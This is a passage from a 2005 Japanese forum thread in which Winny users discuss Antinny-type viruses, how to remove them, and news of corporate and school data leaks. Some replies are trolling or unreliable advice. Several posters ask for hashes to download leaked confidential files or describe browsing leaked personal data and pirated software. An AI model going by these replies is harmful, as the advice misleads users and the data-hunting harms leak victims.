599596:2005/05/26(木) 17:52:03 ID:OcaueFSk0
セーフモードでも削除できませんでした・・・・・・・・・・・・
600[名無し]さん(bin+cue).rar:2005/05/26(木) 17:56:33 ID:fL19P1yq0
>>599
XP?どのセーフモード?
601596:2005/05/26(木) 18:05:19 ID:OcaueFSk0
XPのセーフモードです。
602[名無し]さん(bin+cue).rar:2005/05/26(木) 18:16:28 ID:6kl/OJKI0
絶対パスをメモって、XPのインスコディスクいれて再起動
復旧ウィザードからdelで消すじゃあかんのか?
603[名無し]さん(bin+cue).rar:2005/05/26(木) 18:21:02 ID:wIL06qUF0
  ( ^ω^) …
  (⊃⊂)

 ⊂(^ω^)⊃ セフセフ!!!
  ミ⊃⊂彡

⊂(^ω^)⊃  アウアウ!!!
 ミ(⊃ )
 /   ヽ
604[名無し]さん(bin+cue).rar:2005/05/26(木) 18:23:03 ID:eFX+677w0
529です
>>554アリガトウデス
>>595お疲れ様です

とりあえず、自分なりに色々調べて見ましたが
結局の所、感染しているのかどうかもわからんかったです。orz
ファイルは、まだ手元にあるからどこかに提出しようかなぁ・・・
605[名無し]さん(bin+cue).rar:2005/05/26(木) 18:34:04 ID:zZmYCSUI0
606596:2005/05/26(木) 18:59:02 ID:OcaueFSk0
システムの復元の起動で日にちを1日前にずらしたら
ウイルスファイルがなくなったみたいです。
検索かけてヒットなしでした。
自信はありませんが大丈夫でしょうか?
自分アホなので自信ないです。

それとレスしてくださったみなさん本当に感謝です。
今後のためにいかしたいと思います。

607[名無し]さん(bin+cue).rar:2005/05/26(木) 20:45:37 ID:PdmypWke0
>>553
一目瞭然てなんか特別な表示でもされるんか?

Lhaplusで解凍できんのがたまにあるから
乗り換えようかとは思うんだが
608[名無し]さん(bin+cue).rar:2005/05/26(木) 20:51:59 ID:zZmYCSUI0
アーカイブ展開前に中身が確認できるってことでそ。
二重拡張子やスペースいっぱい拡張子でも、事前にわかるし。
609[名無し]さん(bin+cue).rar:2005/05/26(木) 20:59:34 ID:PdmypWke0
どうも。
今落としてみたけど、ファイル一覧が出て、ファイル内にアイコン埋まってても
デフォのexeアイコンで表示されるみたいっぽいですな
610[名無し]さん(bin+cue).rar:2005/05/26(木) 21:10:38 ID:6RlXrHQx0
最初、RAR解凍というのはWinRAR専用だと思っていた
何故かそのおかげで助かっていた
611[名無し]さん(bin+cue).rar:2005/05/26(木) 22:29:55 ID:TSW8tQIK0
>>583
ぉぃぉぃってのは盲目的にsvchostを消してはいけないということだろ。
ゴミ箱に直接ドラッグして消せるならウイルスじゃないのですぐに戻す。
消せない場合は584ということだろ。
612[名無し]さん(bin+cue).rar:2005/05/26(木) 23:52:19 ID:DksGt1zg0
キンタマウイルスにかかちゃった者です。
ちなみによくわかんない症状がでてる…。
マイドキュメント内の.jpg.がプレビューできなくなってる。
.xls、.docに至っては、めるぽって書き換えられてるんだけど。
613[名無し]さん(bin+cue).rar:2005/05/26(木) 23:53:57 ID:DksGt1zg0
間違えた。めるぽじゃなくてぬるぽだった。ごめんなさい。
614[名無し]さん(bin+cue).rar:2005/05/26(木) 23:54:58 ID:eCID5MMc0
東方厨カエレ!!


ガンガレ!!
615[名無し]さん(bin+cue).rar:2005/05/27(金) 00:05:53 ID:FH8Aj05Q0
>>557
これ考えたヤツ頭良いのか悪いのか
口座とか連絡先から足が着くに決まってるじゃん
ただまぁ


あなたはWinnyを使っていたため、やむを得ず
マイドキュメント内のファイルを暗号化させて頂きました
解除のためには下記の講座への5万円の振り込みが必要です

子供銀行 本店 普通口座 1234567

問い合わせ先
AKKS
電話番号:************
Eメール:******@*******.***

JASLAK
電話番号:************
Eメール:******@*******.***


とかだったら強烈な嫌がらせだけどな。
ここまで行くと悪質すぎてニュースになるかもしれん。
まぁ俺には関係ないことだけどな。
616[名無し]さん(bin+cue).rar:2005/05/27(金) 00:12:30 ID:64LB3eTZ0
ただ消すのと、消さずに暗号化するのと、どっちも同じだろな
連絡先に、それらの機構・団体を晒すってのが、まぁ嫌がらせなんだろけど
キンタマの砲も嫌がらせなのか、自爆なのか…
617[名無し]さん(bin+cue).rar:2005/05/27(金) 00:42:41 ID:HU7YXzad0
グロ画像見ても平気なヤシってなんなの?
 http://news18.2ch.net/test/read.cgi/news7/1110666273/
618[名無し]さん(bin+cue).rar:2005/05/27(金) 05:07:13 ID:RjAdhYRS0
>>14のIMPGMIG.exeは小文字のimpgmig.exeも同じく削除した方がよろしいでしょうか
619[名無し]さん(bin+cue).rar:2005/05/27(金) 07:27:15 ID:buUzQnMa0
>>618
IじゃなくてLだよ
620[名無し]さん(bin+cue).rar:2005/05/27(金) 23:13:30 ID:0p3SP6bM0
621[名無し]さん(bin+cue).rar:2005/05/27(金) 23:37:00 ID:mTIqvLq00
nyやって感染またはインストールされたようなんですが、

ブラウザのホームページが勝手に書き換えられ、インターネットオプションで変更しても
すぐに戻される。(ココ→http://balabolka.biz/start.html
時々変なところにアクセスする。
ブラウザに見慣れない英語のツールバーが表示され、消せない。そこをクリックすると
またどこかにアクセスする。

なんていうスパイウェア(ウイルス?)に感染したか分かりますか?
622[名無し]さん(bin+cue).rar:2005/05/27(金) 23:42:33 ID:cgetJHIb0
ぐぐれ
623[名無し]さん(bin+cue).rar:2005/05/27(金) 23:47:26 ID:mTIqvLq00
いろいろ調べてみた結果、Xupiterの亜種みたいなもんでしょうね
非常に厄介なスパイウェアみたいだが、どうしたらいいのか
624[名無し]さん(bin+cue).rar:2005/05/27(金) 23:54:38 ID:/vdpZL/W0
OS再インスコ
625[名無し]さん(bin+cue).rar:2005/05/27(金) 23:54:48 ID:1GB0PxyP0
>>621
普通のアドウェアかなんかだと思うが、何故感染源をnyだと?

取りあえずアドウェアなら下記スレのテンプレ、関連リンクを熟読せよ
http://pc8.2ch.net/test/read.cgi/sec/1115806118/
626[名無し]さん(bin+cue).rar:2005/05/28(土) 01:29:57 ID:QH4DMTS60
>>621
アドウェアかかったら、必要なデータをどこかに待避させて素直にOS再インスコした方がいいよ。
あれこれいじってるよりは、時間を無駄にしなくて済む。
そんなのにかかった自分がいけないと思ってあきらめるべし。

漢はいつでも何かにかかってもいいように、PCのバックアップはとっておけw
627[名無し]さん(bin+cue).rar:2005/05/28(土) 01:43:30 ID:jGVmsKdm0
大抵は検出・削除でいいと思われるが
628[名無し]さん(bin+cue).rar:2005/05/28(土) 04:13:56 ID:YSAJ6aYn0
不要レジストリの削除も忘れるな
http://www.geocities.jp/regseeker/index.html
629[名無し]さん(bin+cue).rar:2005/05/28(土) 04:49:51 ID:acBk5Lia0
621はCWS感染だろうね。
駆除はちょっと面倒。

詳しくはググって。
630[名無し]さん(bin+cue).rar:2005/05/28(土) 16:11:08 ID:G4Lm9q/D0
アンチソフトに引っかからないウイルスの発見ってどうすればできるんだ
631[名無し]さん(bin+cue).rar:2005/05/28(土) 18:45:18 ID:IsttihBO0
隔離環境で動かしてみて、挙動を観察する
あるいは、中身を覗いて怪しげなコードがないかどうかを見る

入手先が怪しいのだから、すべて疑ってかかるべし
632[名無し]さん(bin+cue).rar:2005/05/28(土) 18:47:40 ID:xyILwzGy0
「ウイルスさん、隠れてないで出ておいで」と優しく語り掛ける
633[名無し]さん(bin+cue).rar:2005/05/28(土) 18:51:55 ID:hWefd0l70
>>630
動作中のプロセス確認すりゃ分かる
634[名無し]さん(bin+cue).rar:2005/05/28(土) 19:09:19 ID:I7njzczf0
>>633
サービスで動いているにゅいるすはどうするんだよ
635[名無し]さん(bin+cue).rar:2005/05/28(土) 19:22:15 ID:UIF+Z5px0
別のプロセスにマッピングされていたら(ry

っていうか、今までそんな手の込んだウイルスなんてあったか?
636[名無し]さん(bin+cue).rar:2005/05/28(土) 19:44:02 ID:oVQ+n/jQ0
自動起動に登録してさっさと終了するのが手っ取り早いからよく使われる
637[名無し]さん(bin+cue).rar:2005/05/28(土) 19:54:28 ID:IsttihBO0
マジでSVCHOST経由で起動されたら、プロセス見るぐらいでは
チェックはできないだろな

コードにしても、暗号化してあれば動かすまで分からない
638[名無し]さん(bin+cue).rar:2005/05/28(土) 20:37:57 ID:hWefd0l70
P2Pを対象にしたウイルスはどれも技術レベルは低めだから簡単なチェックでイケル。
でも、脆弱性の使い方やセンス、アイデアは抜群に良いんだよな。
さすが2ちゃんねらーww
639[名無し]さん(bin+cue).rar:2005/05/28(土) 20:39:55 ID:fi6uHraj0
まぁな
640[名無し]さん(bin+cue).rar:2005/05/28(土) 21:03:37 ID:WdIPcq2m0
えへ
641[名無し]さん(bin+cue).rar:2005/05/28(土) 21:18:40 ID:C9YJsfbR0
まかせろ
642[名無し]さん(bin+cue).rar:2005/05/28(土) 23:22:28 ID:fo8QmemL0
ウィルス作者、ウィルス新種まだー?
643[名無し]さん(bin+cue).rar:2005/05/28(土) 23:36:54 ID:hLLnZBZj0
がまんしろ
644[名無し]さん(bin+cue).rar:2005/05/28(土) 23:38:36 ID:17Txok1V0
>>630
ファイルがそれほど大きくなければメモ帳で眺める。
645[名無し]さん(bin+cue).rar:2005/05/29(日) 01:21:10 ID:3hW9QgDu0
ウィルス作者向けの板ってないの?
646[名無し]さん(bin+cue).rar:2005/05/29(日) 01:54:10 ID:yyUIF4am0
もうだめぽで有名な犯罪者隔離板はここです
647[名無し]さん(bin+cue).rar:2005/05/29(日) 03:49:12 ID:PJ+ZvL3j0
おい、ウイルスの作者を追い込まねーか?
おまえらならできるだろ、いろいろと。
648[名無し]さん(bin+cue).rar:2005/05/29(日) 04:05:09 ID:P/wKjkIZ0
みんなPCをオフラインで使うようになったら、ウィスル作者は撲滅できるんじゃねえか?
649[名無し]さん(bin+cue).rar:2005/05/29(日) 04:16:32 ID:38xDC/DQ0
>>648がいいことを言った
650[名無し]さん(bin+cue).rar:2005/05/29(日) 04:44:30 ID:ur6M/CdT0
何か、キャッシュがさっきからnyを再起かけたりすると、
毎度のことのように、0!って出てる・・・・。  orz
こんなウイルスってあったっけ?
651[名無し]さん(bin+cue).rar:2005/05/29(日) 06:10:38 ID:PM6EsCjp0
■ニュイルス用質問テンプレ
【使用OS】 winXP SP2
【WindowsUpdateしてるか】している
【使用AntiVirusソフト】 ノートン2005
【AntiVirusをUpdateしてるか】している
【Winnyのバージョン】2.0b7.1
【Winny歴、総DL量】1ヶ月 30G
【テンプレを読んだか】読んだ
【テンプレにある対策を実行したか】該当なし
【症状、具体的に分かる限りすべて書く】マイクロソフト製品でファイルの場所にFTPロケーション 
 FTPパスの追加 変更のフォルダが出来ている
【何をしたらそんなことになったのかMicrosoft OfficeXP with Front Page VL化済[認証不要」Zip
DLして サイズ 475 MB (498,323,456 バイト)
※感染元のファイルの情報もあると良し
【これまでにとった措置】LANケーブルを外す winny本体の削除

よろしく御願いします
652[名無し]さん(bin+cue).rar:2005/05/29(日) 07:31:38 ID:TdrWUaFn0
>>651
通報しますた
653[名無し]さん(bin+cue).rar:2005/05/29(日) 11:51:10 ID:zaO1khKN0
>>644
どうやって?そんなことできるのか?
654[名無し]さん(bin+cue).rar:2005/05/29(日) 19:47:54 ID:6jKgvYzy0
>>653
bug.exeだっけか…
メモ帳で眺めると  氏ね  とか書かれたりするな。

新種を発見するのは難しいかも知れないが、ファイルの安全性の判断の一つにはなるかと。
655[名無し]さん(bin+cue).rar:2005/05/29(日) 23:03:49 ID:PJ+ZvL3j0
しかし、ネットって人間の裏側が見えまくりで嫌だね。
656[名無し]さん(bin+cue).rar:2005/05/29(日) 23:46:05 ID:xPPhp1XJ0
まるで、現実社会がそうじゃないような言い方ですね。
657[名無し]さん(bin+cue).rar:2005/05/29(日) 23:46:12 ID:/5RQw5LG0
でもnyウイルスはある程度あったほうがいいんじゃねーか?
658[名無し]さん(bin+cue).rar:2005/05/29(日) 23:47:58 ID:PJ+ZvL3j0
なんで?
厨房避け?
659[名無し]さん(bin+cue).rar:2005/05/30(月) 00:27:24 ID:mPB7Yj8D0
厨房よけにばら撒くのなら、再起動でHDD全消去にしてもらわないと…
下手に(システムを)いかしておくものだから、質問厨が増えるだけだよなぁ。
660[名無し]さん(bin+cue).rar:2005/05/30(月) 00:45:26 ID:Xxo0jcJx0 BE:124251438-
山田ウイルスに感染しているか確認する方法
ttp://127.0.0.1/
開けると感染中
661[名無し]さん(bin+cue).rar:2005/05/30(月) 00:56:42 ID:E+CR6Tyv0
>>660
テンプレにある
そもそも山田nyと関係ないだろ
662[名無し]さん(bin+cue).rar:2005/05/30(月) 02:43:08 ID:WoAsyzDJ0
>>657
俺もnyにウイルスがあったほうがいいと思ってるよ
ダウソやnyは「危険なもの」としてくれているほうが都合がいい

日本の場合、nyコップのおかげでny使用者の逮捕は難しくなった。
(著作権法の時効は3年なのでそろそろ・・・)

今後、コンテンツはネットによる配信が主流になるのは間違いない
だが、法の整備や課金システムの構築にはまだまだ時間がかかる
法律に関しては著作権法だけの問題ではない。課金方法によっては、個人や通信内容を特定する
必要があるが、監視社会への反対運動や国民総背番号制の導入などの問題に発展するかもしれない
また、著作権の定義自体が大きく変わる可能性もある(いい加減ミッキーを自由にしてやれよw)

親告罪なので警察はコンテンツホルダーとの連携が必要だ
裁判では万が一にも負けるわけにはいかないのだけど、nyには有名な脱法トリックがある
たとえ逮捕者が有罪となっても、「でも・・・の場合は無罪の可能性がある」なんてことになったら
面倒なことになる。裁判での見通しが立つまではコンテンツホルダーも動きづらい。

>>658
厨よけというよりはむしろ、ny人口の抑制の意味が大きい
公共機関や企業では内部規定で「ny禁止令」が出ているが、このおかけで多くの人がプライベート
でもnyを始めることに抵抗を感じている
そうしたnyに対するネガティブなイメージにより、ny人口は著作権産業が崩壊しない程度に抑えられている

そんなわけで、もうしばらくはウイルス作者が「活躍」するだろう
663[名無し]さん(bin+cue).rar:2005/05/30(月) 03:09:30 ID:mPB7Yj8D0
ダウソだけのnyを作ればいいんだよな………………ハッ!

目に見えない情報やサービスってものの価値に関して、多くの人は
金を払って手に入れようとするだろうか? という疑問を持ってる。
CDを買う人は、情報の記録された板とジャケットとケースを買っている
のであって、曲に金を払ってると思う人は少ないんじゃないかなァ。と。

nyもパッケージソフトにして、定期的にAC○SとかJAS○ACとかに上納金を
支払わないと使えないようにすれば、この手の患部組織も儲かったのにねぇ。

そういえば47氏の公判の前になると、ニュイルスって増えるんだよな。
しかも、ユーザー個人情報放流系の怪しいやつばかり。
だれが流しているのかなんて、だれにでも想像が付く。
そういえば、次は6/2だっけ? 何回目なんだろう
664[名無し]さん(bin+cue).rar:2005/05/30(月) 05:09:12 ID:qU4/Oj860
仁義なきキンタマについて質問です。
色々なサイトを読んでまずはタスクマネージャーのsvchostのプロセスを切ればいいことがわかりましたが
どのsvchostを切ればいいのかわかりません。自分はWIN2000を使っているからかどうかわかりませんが、
右にユーザー名が表示されないの困っています。このような場合はどうしたらよいのでしょうか?
665[名無し]さん(bin+cue).rar:2005/05/30(月) 05:42:56 ID:2HNbrVi+0
どんなサイト見てきたんだよ・・・
666[名無し]さん(bin+cue).rar:2005/05/30(月) 11:06:43 ID:NG0LgCn/0
いっぱいいっぱいみたいだから
おとなしくクリーンインスコした方が早そう
667[名無し]さん(bin+cue).rar:2005/05/30(月) 11:08:32 ID:dLJCTGOD0
>>664
そう書いてあったサイトを晒してくれないか?
668[名無し]さん(bin+cue).rar:2005/05/30(月) 11:33:52 ID:cK57Nd6S0
>>664
全部切ってみればいいと思うよ
669664:2005/05/30(月) 12:33:23 ID:9VOazYyN0
>>665
このスレのまとめサイトには載っていました・・・。

あとC:\WINDOWS\system32\drivers\svchost.exeを削除すれば終わりみたいなのですが
削除しようとするとファイルを使用中の可能性がありますといって削除できない状態です。
やはりタスクマネージャーから一回切らないといけないのでしょうか。
670[名無し]さん(bin+cue).rar:2005/05/30(月) 12:56:55 ID:IdNtRW9a0
>>669
セーフモードで起動
671ひみつの文字列さん:2024/12/25(水) 21:42:58 ID:MarkedRes
日本国またはアメリカ合衆国、もしくはその両方の著作権法に触れる内容であると疑われることから表示できません。
672[名無し]さん(bin+cue).rar:2005/05/30(月) 15:46:55 ID:q70l0ApN0
>>671
大丈夫なんじゃない?

心配ならキンタマの活動内容を自分で調べてみたら?
673[名無し]さん(bin+cue).rar:2005/05/30(月) 15:51:00 ID:dLJCTGOD0
>>671
人間が直後って感じても、PCにとっては十分すぎるほどの時間かも
しれないじゃない。心配なら初期化リカバリすべし、大丈夫だと思
うならそのまま使うべし。その判断はユーザーに委ねられている。
674[名無し]さん(bin+cue).rar:2005/05/30(月) 15:52:14 ID:2RtVY9x70
>>672
各種キンタマ調べて、どうやら大丈夫そうだとは思うのですが、
スキャンしても何も見つからないのが逆に不安なんですよね。
675[名無し]さん(bin+cue).rar:2005/05/30(月) 15:58:41 ID:q70l0ApN0
>>674
そこまで怖がるんなんら、ny止めたら?
キンタマの場合、nyを使わなかったら何の脅威も無いんだから。
676[名無し]さん(bin+cue).rar:2005/05/30(月) 16:59:03 ID:axmASYNb0
>>674
そんなに不安ならネットに繋ぐな('A`)
677[名無し]さん(bin+cue).rar:2005/05/30(月) 17:17:03 ID:WJU1YSKm0
>>674
俺だったら、再インストールする。
まぁ、俺は、ネットワーク専用パソは定番ソフト以外使わないが。
678[名無し]さん(bin+cue).rar:2005/05/30(月) 17:17:19 ID:/qSBdXy/0
なんでニセってわざわざ書いてるのに踏んだの?
679[名無し]さん(bin+cue).rar:2005/05/30(月) 17:32:16 ID:KyGfFG/t0
男はわかっていてもいかなきゃならないときがある
680[名無し]さん(bin+cue).rar:2005/05/30(月) 23:23:47 ID:airL3ha70
普段から備蓄しとけよ
681[名無し]さん(bin+cue).rar:2005/05/30(月) 23:40:19 ID:04DqocEe0
危険なものとはいえ晒されてる人が可愛そすぎます><

キンタマ情報晒してる人って個人情報保護法で取り締まりとかできないものなのでしょうか?


682[名無し]さん(bin+cue).rar:2005/05/30(月) 23:41:10 ID:J5v7ueqm0
>>678
ニセ「ニセ教祖」だったら彼も踏んでないだろう。
683[名無し]さん(bin+cue).rar:2005/05/31(火) 01:05:39 ID:S763NtIP0
ただの教祖でも踏んでないと思う
684[名無し]さん(bin+cue).rar:2005/05/31(火) 01:14:00 ID:RneZlJpG0
つーか、教祖を踏むなんて罰当たりなやつに天罰が下ったんだよ。
685[名無し]さん(bin+cue).rar:2005/05/31(火) 09:43:13 ID:zteXm/Xk0
http://www.vipper.org/vip21114.jpg.html
こんなアイコンの奴踏んじゃったんだが大丈夫だろうか
_env.exeと_config.exeと2種類見つけた中身は
http://www.vipper.org/vip21115.jpg.htm
こんなの
686ひみつの文字列さん:2024/12/25(水) 21:42:58 ID:MarkedRes
日本国またはアメリカ合衆国、もしくはその両方の著作権法に触れる内容であると疑われることから表示できません。
687[名無し]さん(bin+cue).rar:2005/05/31(火) 22:29:29 ID:U+n3JOC00
【IT】国内ファイル交換ソフト、現ユーザーは127万人、9割が未承諾ファイル
http://news18.2ch.net/test/read.cgi/bizplus/1117545254/
688[名無し]さん(bin+cue).rar:2005/06/01(水) 02:40:43 ID:wfypmXjC0
nyのフォルダに(null)BbsNoderef.txtというのが2つできてnyを起動できなくなりました
これはどのウィルスでしょうか?
689[名無し]さん(bin+cue).rar:2005/06/01(水) 03:02:16 ID:pUsw2mqZ0
Human Immunodeficency Virusだと思うよ
690[名無し]さん(bin+cue).rar:2005/06/01(水) 03:03:54 ID:udYJxciH0
頭が厨房ウイルスにやられた。

つかぐぐれ
691[名無し]さん(bin+cue).rar:2005/06/01(水) 12:26:20 ID:iyVoH22H0
ANTINNY系に感染してるとウイルスバスターで
 出てきたから、感染したファイル全部(3っ)消したら
  キャッシュの中身全部消えてた
  
 もういいや あかん だめだ 終わった もうどうでもいい 死のうかな
692[名無し]さん(bin+cue).rar:2005/06/01(水) 12:39:40 ID:DDqwHYdp0
俺も、俺もshareのバージョン上げたらキャッシュが全部消えたことあった。
693[名無し]さん(bin+cue).rar:2005/06/01(水) 12:42:19 ID:l9jd8nIC0
仕様
694[名無し]さん(bin+cue).rar:2005/06/01(水) 13:00:13 ID:m02w1kpt0
>>691
外付けHDDに定期的にバックアップしないのか?
695[名無し]さん(bin+cue).rar:2005/06/01(水) 15:15:13 ID:X5wGVvWL0
ttp://www.mainichi-msn.co.jp/it/computing/news/20050601k0000e040068000c.html
NTTドコモ東海:基地局情報ネット流出 ウイルス感染か
NTTドコモ東海(名古屋市中区)が静岡、愛知、岐阜県内に設置している
携帯電話基地局約800カ所の所在地や入局方法などをまとめた「社外秘」扱いの資料が、ネット上に流出していることが分かった。
基地局の位置情報はセキュリティーなどを理由に非公開となっており、事態を重視した同社は約800カ所すべての鍵を付け替えるなど緊急対策を実施した。


ファイル交換ソフト「ウィニー」のウイルス感染が原因とみられ、


個人情報だけでなくこうした防犯上問題のある情報まで漏えいさせるネット上の“無法地帯ぶり”がさらに浮き彫りとなった。
696[名無し]さん(bin+cue).rar:2005/06/01(水) 15:18:07 ID:gEpLRsuQ0
http://www.mainichi-msn.co.jp/it/computing/news/20050601k0000e040068000c.html
2005年06月01日
NTTドコモ東海:
基地局情報ネット流出 ウイルス感染か
 NTTドコモ東海(名古屋市中区)が静岡、愛知、岐阜県内に設置している携帯電話基地局約
800カ所の所在地や入局方法などをまとめた「社外秘」扱いの資料が、ネット上に流出してい
ることが分かった。基地局の位置情報はセキュリティーなどを理由に非公開となっており、事
態を重視した同社は約800カ所すべての鍵を付け替えるなど緊急対策を実施した。ファイル
交換ソフト「ウィニー」のウイルス感染が原因とみられ、個人情報だけでなくこうした防犯上問
題のある情報まで漏えいさせるネット上の“無法地帯ぶり”がさらに浮き彫りとなった。


ハッシュきぼんぬ
697[名無し]さん(bin+cue).rar:2005/06/01(水) 15:27:38 ID:X/vkoa1I0
>>696
ニュースサイトで発表しているファイル名では見つからないよ。
隠匿して報道しているね。
てかそれ以上にやばいやつ出回っていると思うのだが…
698[名無し]さん(bin+cue).rar:2005/06/01(水) 15:31:45 ID:CPhRE4OD0
たしか仁義キンタマだったとおもう。もう消したのでハッシュはワカンネ
699[名無し]さん(bin+cue).rar:2005/06/01(水) 15:35:36 ID:Z3jamM+90
無法地帯って・・・ まるでNTTとは無関係な第三者が勝手にnyに流したみたいな書き方だな・・・。
700[名無し]さん(bin+cue).rar:2005/06/01(水) 15:41:07 ID:Z3jamM+90
そのうちこういうやばいもんのハッシュをテキストにまとめて流すヤツが現れるだろうなw
701[名無し]さん(bin+cue).rar:2005/06/01(水) 16:11:39 ID:XqOJv5Dc0
【ドモコ】 winnyキンタマウイルス感染 【テラヤバス】  
http://news19.2ch.net/test/read.cgi/news/1117609611/
NTTドコモ東海が静岡、愛知、岐阜県内に設置した携帯電話基地局
約800カ所の所在地や入局方法などをまとめた「社外秘」扱いの資料が、
ネット上に流出していることが分かった。事態を重視した同社はすべての
鍵を付け替えるなど緊急対策を実施した。ファイル交換ソフト「ウィニー」の
ウイルス感染が原因とみられる。
702[名無し]さん(bin+cue).rar:2005/06/01(水) 16:20:55 ID:f99qayfC0
また毎日か!

・旧湯沢市情報漏えいで質問したのは毎日新聞大阪本社社会部記者
・詳細忘れたけど、ニシキオリの保険情報も第一報は毎日新聞

毎日新聞は片端からチェックしているな(w
703[名無し]さん(bin+cue).rar:2005/06/01(水) 16:22:12 ID:Rpzzn9+M0
ハッシュまだぁ!!!
704[名無し]さん(bin+cue).rar:2005/06/01(水) 17:05:04 ID:2Sl/evAL0
ハッシュ チン☆⌒ 凵\(\・∀・) まちくたびれたー!!
705[名無し]さん(bin+cue).rar:2005/06/01(水) 17:09:23 ID:D41dxNIa0
すでに捏造関連画像が流れてる(エロゲ系?)w
706[名無し]さん(bin+cue).rar:2005/06/01(水) 17:11:53 ID:67iWWfjR0
winnyってウィルスがあるかのようですなぁ
707[名無し]さん(bin+cue).rar:2005/06/01(水) 17:42:24 ID:Y6l77wUY0
>>703-704
ここでいくら待っても無駄だよ
708[名無し]さん(bin+cue).rar:2005/06/01(水) 18:20:19 ID:VrAdOrTJ0
>>703-704
【ネット】"猛威奮う" 「Winny」で、NTTドコモ東海が"社外秘"情報流出
http://news19.2ch.net/test/read.cgi/newsplus/1117606701/
709ひみつの文字列さん:2024/12/25(水) 21:42:58 ID:MarkedRes
日本国またはアメリカ合衆国、もしくはその両方の著作権法に触れる内容であると疑われることから表示できません。
710[名無し]さん(bin+cue).rar:2005/06/01(水) 21:40:18 ID:f99qayfC0
>>709
ん、こないだ先生反応した………サイズ違いか(´・ω・`)
多分山田亜種だ
711[名無し]さん(bin+cue).rar:2005/06/01(水) 22:14:24 ID:dn2ldYQk0
NTT御用達になったのか
なんか誇らしいね
712[名無し]さん(bin+cue).rar:2005/06/02(木) 00:03:49 ID:9NJD5DNY0
全ての悪意ある実行ファイルに対応しなければならないってのは
何か間違っていると思うのだが?
713[名無し]さん(bin+cue).rar:2005/06/02(木) 00:57:32 ID:X9e/hXy/0
新種らしきものを確保した。
感染したと思われる日が2005/5/29になってるしたぶん新種だとおもうんだけどどうかな。


仁義拾ったらその中にnyフォルダも入ってて、UPフォルダに

【晒し挙げ】 shotaのデスクトップ[05-06-01].jpg

ってのが入ってた。 【晒し挙げ】 ってのは初見なんだけど新種?
714[名無し]さん(bin+cue).rar:2005/06/02(木) 01:01:05 ID:hIYuXDsu0
>>712
それはまぁそうなんだが
理想論でも「検査してOKならシロ」と信じられる程度でなければ何も使えないじゃない
715[名無し]さん(bin+cue).rar:2005/06/02(木) 01:02:25 ID:hIYuXDsu0
まぁ、漏れは動画と漫画と曲が多いからexe無視で大丈夫だけど
エロゲとかの人は死活問題かもよ
716[名無し]さん(bin+cue).rar:2005/06/02(木) 01:02:45 ID:hx/Q7PHG0
>>713
だいぶ前に見た気がする
717[名無し]さん(bin+cue).rar:2005/06/02(木) 01:09:53 ID:X9e/hXy/0
>>716
orz
718[名無し]さん(bin+cue).rar:2005/06/02(木) 02:19:09 ID:Qmtkxyy80
NTTの奴は4月(3月だったかな?)時点で入手できていたのに、対応遅すぎw
今更の感が強いな
719[名無し]さん(bin+cue).rar:2005/06/02(木) 02:30:17 ID:X9e/hXy/0
仁義のドキュメントの大半は3月16日〜20日くらいに流出したもの。

大量の仁義の中から重要なファイルを探し出す仁義ハンターがどっかに晒すなり会社に
通報するなりしないとなかなか問題として認識されないのが現状だよね。

ちなみに本人に通報しても高確率でスルーされる。
今まで20人ほどにメール送ったが返事が来たのは2通のみ。 しかも1通は匿名フリメ使ってきた。
この中にはJAそうまの件も含まれているw
720[名無し]さん(bin+cue).rar:2005/06/02(木) 03:10:11 ID:ajCHNiAh0
そりゃ、流しちゃまずいデータのあるPCでnyやってりゃ
犯罪みたいなもんだからな。本人は否定したいだろよ。
(きずいた時点で同僚にnyをすすめて回ったりしてな)
721[名無し]さん(bin+cue).rar:2005/06/02(木) 03:25:37 ID:4Ssv5tFP0
【Winny】愛知の小学校、児童の名簿や成績表など流出
http://news19.2ch.net/test/read.cgi/news/1117649872/
722[名無し]さん(bin+cue).rar:2005/06/02(木) 04:05:54 ID:X9e/hXy/0
仁義の作者は今頃勝利の美酒に酔いしれてるかも知れんな。
723[名無し]さん(bin+cue).rar:2005/06/02(木) 04:35:18 ID:CUKnTf8e0
>>719
匿名フリメは当たり前だろう。
724[名無し]さん(bin+cue).rar:2005/06/02(木) 04:39:47 ID:X9e/hXy/0
>>723
でもメールのヘッダに本名が入ってたw
725[名無し]さん(bin+cue).rar:2005/06/02(木) 04:54:23 ID:CUKnTf8e0
テラワロス、イミネー
さすが仁義感染者だ。
726[名無し]さん(bin+cue).rar:2005/06/02(木) 05:06:56 ID:rX+WVyOY0
個人情報保護法が始まったのが4月で、仁義キンタマが感染拡大し
はじめたのが3月中旬。このタイミングを狙ったのではないのか。
そしてたくさん釣れたと。
727[名無し]さん(bin+cue).rar:2005/06/02(木) 05:54:29 ID:wh5/qwaU0
でも、まったく知らんやつの個人情報見てもなんもおもろないやろ
728[名無し]さん(bin+cue).rar:2005/06/02(木) 07:30:39 ID:q39DwSwE0
>>727
最初はおもろいおもたけど、すぐに秋田。
729[名無し]さん(bin+cue).rar:2005/06/02(木) 07:35:39 ID:fvWTq+o90
>>724
(゚д゚)ポカーン
730[名無し]さん(bin+cue).rar:2005/06/02(木) 07:38:54 ID:KvQD//6W0
個人情報見てもおもろないけど
リアルタイムデスクトップはおもろい時はおもろい。
人間は田代性を持った生き物だからな。
731[名無し]さん(bin+cue).rar:2005/06/02(木) 07:55:45 ID:w/Abc42C0
そういや仁義が出回った時落としまくったけどそれ以来放置してるな。消すか
732[名無し]さん(bin+cue).rar:2005/06/02(木) 08:30:51 ID:AdY9dab80
>>686
これ140MBもあるじゃん。
簡単に通報できないようにでっかくしたんだろうね。
ウイルス作者必死だな。
まんどくせーから通報しないよこんなの。
733[名無し]さん(bin+cue).rar:2005/06/02(木) 08:50:37 ID:l5cPCYkH0
たまに解凍したファイルの数が5つなのに
6つと表示されて変だなって思って
5つのファイルを取り出してみると
空のフォルダなのにファイル1って
表示されます。これって何なんでしょうか?
734[名無し]さん(bin+cue).rar:2005/06/02(木) 10:09:26 ID:ajCHNiAh0
ただのディレクトリだろ。ディレクトリ情報ってのはファイルとして管理されてるんだヨ
735[名無し]さん(bin+cue).rar:2005/06/02(木) 10:12:43 ID:7c8vE69n0
>>721
【ネット】"前代未聞" 「Winny」で、小学校全児童の名簿&一部成績表流出…愛知
http://news19.2ch.net/test/read.cgi/newsplus/1117650243/
736[名無し]さん(bin+cue).rar:2005/06/02(木) 10:35:16 ID:dFLg1mBk0
【画像あり】WinnyでNECの社員リスト流出
http://news19.2ch.net/test/read.cgi/news/1117674007/
737[名無し]さん(bin+cue).rar:2005/06/02(木) 11:15:42 ID:yTvtjsKD0
玉田じゃなくAntiny.Kに引っかかっていたようだ_| ̄|○
通称キンタマ?
晒し挙げはAntiny.KかGだと思う
